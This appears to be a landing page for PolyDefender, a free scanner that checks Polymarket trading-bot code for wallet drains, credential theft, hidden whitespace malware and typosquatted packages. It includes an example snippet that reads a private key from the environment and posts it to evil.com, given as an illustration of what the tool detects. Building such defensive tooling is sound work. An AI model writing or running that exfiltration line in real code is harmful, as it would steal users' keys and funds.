PolyDefender

FREE AI security scanner that detects wallet drains, API key theft, and malicious code in Polymarket Bots

Free to use

<10s scan

No data stored

1,247+

Scans Run

$485K+

Stolen Recently

1,200+

Threat Patterns

Attack Types

<10s

Scan Time

Recent Scan Activity

Live community scans

View all

2m agoSafe

Python0 findings

Clean Polymarket CLOB trading bot

Live Feed

8 recent

95SafePytClean Polymarket CLOB trading bot2m ago

8MaliciousJavTrust412 pattern detected — private key exfiltration via Telegram5m ago

100SafeTypPolymarket order-utils wrapper — no threats found8m ago

62SuspiciousPytUnusual base64 strings and external HTTP POST requests12m ago

22DangerousJavClipboard hijacker replacing wallet addresses with attacker-controlled address15m ago

91SafePytStandard Polymarket copy-trading bot using official py-clob-client18m ago

3MaliciousPytGitVenom hidden code after 2000+ tabs — stealer exfiltrating to Discord webhook23m ago

88SafeTypNext.js dashboard for Polymarket analytics — clean27m ago

Powerful Features

Complete Security Toolkit

Scan Polymarket bots for wallet drains and credential theft before you run them. Free.

Popular

GitHub Repository Scan

Paste any GitHub URL to scan entire repositories. Analyzes all Python, JavaScript, and TypeScript files for threats.

Paste & Scan Code

Paste code directly into the scanner for instant analysis. Supports Python, JavaScript, and TypeScript.

AI-Powered Analysis

Opus 4.5 powered deep analysis detects novel attack patterns beyond simple regex matching.

Scan History

Access previous scans instantly

Share Results

Share reports via link or download

Private Key Detection

Catches credential theft attempts

Malicious Packages

Detects typosquatted libraries

Real Threats

Active Polymarket Attacks

These attacks have stolen hundreds of thousands from traders running unverified code.

Trust412 Attack

critical

Dec 2025

Malicious validate_mcp function stealing private keys via hidden dependency

Loss: Active

GitVenom

critical

2+ Years

Malware hidden after 2000+ whitespace characters in Python files

Loss: $485K+

Typosquatting

high

Ongoing

Fake packages mimicking official Polymarket libraries

Loss: Ongoing

Quick Start

How to Use the Scanner

Scan any code in 3 simple steps

Paste Code or URL

Copy the bot code or paste a GitHub repository URL into the scanner input.

Run the Scan

Click "Scan Code" or "Scan Repository" and let our AI analyze every line for threats.

Review & Download

Review the detailed findings, severity ratings, and download the full PDF report.

Detection Engine

What We Detect

PolyDefender scans for 1,200+ threat patterns across 12 attack categories.

Private key exfiltration

Credential theft

Hidden whitespace code

Base64/Hex obfuscation

Malicious dependencies

Clipboard hijacking

Trust412 patterns

GitVenom signatures

Typosquatted packages

Environment theft

Network exfiltration

MCP exploits

malicious_bot.py

1 import requests, os

3 key = os.environ["PRIVATE_KEY"]

4 requests.post("https://evil.com", data=key)

6 # CRITICAL: Credential Exfiltration

Trusted Security Scanner

Built specifically for the Polymarket trading community

Open Source Patterns

Community-verified

Privacy First

No code stored

Real-time Analysis

Instant results

Regular Updates

New threats daily

Protect Your Funds from Malicious Bot Code

Scan any code from GitHub, Telegram, or Discord in seconds.

FAQ

Frequently Asked Questions

Everything you need to know about PolyDefender

Yes! PolyDefender is 100% free to use with no account required. Simply paste your code or a GitHub URL and get instant security analysis. No credit card, no sign-up.

We currently support Python, JavaScript, and TypeScript — the most common languages used in Polymarket trading bots. This covers .py, .js, .ts, and .tsx files.

No. Your code is analyzed in real-time and never permanently stored on our servers. We prioritize your privacy — scan results are cached temporarily for sharing links but the source code itself is not retained.

PolyDefender uses a two-layer approach: first, pattern matching against 1,200+ known threat signatures (including Trust412, GitVenom, and typosquatting attacks). Then, AI-powered deep analysis detects novel and obfuscated threats that simple regex can't catch.

Yes! Paste any public GitHub repository URL and PolyDefender will automatically scan all supported files in the repo. It analyzes the entire codebase and produces a combined security report.

Do NOT run the code. Review each finding carefully — the report includes explanations of what each threat does, its severity level, and recommended remediation steps. When in doubt, avoid the code entirely.

Our threat database is updated regularly as new Polymarket-targeted attacks are discovered. This includes patterns from real attacks like Trust412, GitVenom, and emerging typosquatting campaigns.